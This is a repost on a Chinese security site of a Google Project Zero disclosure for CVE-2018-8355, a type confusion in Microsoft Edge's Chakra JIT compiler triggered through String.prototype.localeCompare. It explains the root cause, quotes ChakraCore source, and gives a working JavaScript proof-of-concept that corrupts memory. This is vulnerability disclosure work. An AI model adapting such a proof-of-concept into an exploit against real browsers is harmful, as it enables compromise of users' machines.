首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge Chakra JIT localeCompare Type Confusion
来源:Google Security Research 作者:lokihardt 发布时间:2018-09-18  
Microsoft Edge: Chakra: JIT: Type confusion with localeCompare 

CVE-2018-8355


A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for <a href="/p/project-zero/issues/detail?id=1565" title="Microsoft Edge: Chakra: JIT: ImplicitCallFlags check bypass with Intl" class="closed_ref" rel="nofollow"> issue 1565 </a>.

The only usable code I could find in the JavaScript localeCompare was:
            const thatStr = String(that);

I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.

Here's the JavaScript localeCompare.

let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
    if (this === undefined || this === null) {
        platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
    }

    const thisStr = String(this);
    const thatStr = String(that);

    // Performance optimization to cache the state object and UCollator when the default arguments are provided
    // TODO(jahorto): investigate caching when locales and/or options are provided
    let stateObject;
    if (locales === undefined && options === undefined) {
        if (localeCompareStateCache === undefined) {
            localeCompareStateCache = _.create();
            InitializeCollator(localeCompareStateCache, undefined, undefined);
        }

        stateObject = localeCompareStateCache;
    } else {
        stateObject = _.create();
        InitializeCollator(stateObject, locales, options);
    }

    return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare */ true);
}), IntlBuiltInFunctionID.StringLocaleCompare);

My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].

[1] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984</a>
[2] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297</a>
[3] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831</a>
[4] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492</a>


PoC:
function opt(arr, s) {
    arr[0] = 1.1;

    if (s !== null) {
        let tmp = 'a'.localeCompare(s);
    }

    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];

    for (let i = 0; i < 100; i++) {
        'a'.localeCompare('x', []);  // Optimize the JavaScript localeCompare

        opt(arr, null);  // for profiling all instructions in opt.

        try {
            opt(arr, {toString: () => {
                throw 1;  // Don't profile "if (locales === undefined && options === undefined) {"
            }});
        } catch (e) {

        }
    }

    opt(arr, {toString: () => {
        // Called twice
        arr[0] = {};
    }});

    print(arr);
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CA Release Automation NiMi 6.5
·Microsoft Edge Chakra PathType
·Netis ADSL Router DL4322D RTK
·Solaris libnspr NSPR_LOG_FILE
·Oracle VirtualBox Manager 5.2.
·Apache Syncope 2.0.7 Remote Co
·NUUO NVRMini2 3.8 - 'cgi_syste
·Notebook Pro 2.0 - Denial Of S
·LG SuperSign EZ CMS 2.5 - Loca
·XAMPP Control Panel 3.2.2 - De
·NICO-FTP 3.0.1.19 - Buffer Ove
·Faleemi Plus 1.0.2 - Denial of
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved